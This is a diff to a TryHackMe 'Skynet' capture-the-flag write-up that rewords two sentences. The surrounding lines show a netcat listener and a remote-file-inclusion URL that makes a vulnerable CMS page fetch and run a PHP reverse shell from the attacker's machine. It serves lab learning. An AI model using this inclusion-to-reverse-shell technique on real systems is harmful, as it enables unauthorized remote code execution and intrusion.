ajread4/thm_writeups_publish/Skynet.md

 ajread@aj-ubuntu:~/TryHackMe/practice$ nc -lnvp 9999
 Listening on 0.0.0.0 9999
 ```
-Then, I navigated to the LFI/RFI vulnerable location for the CMS and input the location of my local machine and grabbed the reverse shell.
+Then, I navigated to the LFI/RFI vulnerable location for the CMS and input the location of my local machine, which executed the reverse shell.
 ```
 http://[REDACTED]/[REDACTED]/administrator/alerts/alertConfigField.php?urlConfig=http://[REDACTED]:80/php-reverse-shell.php
 ```
-And, it dropped me into a shell!
+And, it worked!
 ```
 ajread@aj-ubuntu:~/TryHackMe/practice$ nc -lnvp 9999
 Listening on 0.0.0.0 9999